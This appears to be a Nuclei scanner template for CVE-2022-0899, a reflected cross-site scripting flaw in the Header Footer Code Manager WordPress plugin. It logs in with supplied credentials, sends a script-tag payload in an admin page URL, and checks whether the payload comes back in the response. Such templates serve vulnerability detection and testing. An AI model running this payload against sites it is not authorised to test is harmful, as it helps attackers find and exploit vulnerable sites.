43 lines
1.3 KiB
YAML
43 lines
1.3 KiB
YAML
id: CVE-2022-0899
|
|
|
|
info:
|
|
name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0899
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-0899
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(content_type_2, "text/html")'
|
|
- 'contains(body_2, "<script>alert(/document.domain/)</script>")'
|
|
- 'contains(body_2, "All Snippets")'
|
|
condition: and
|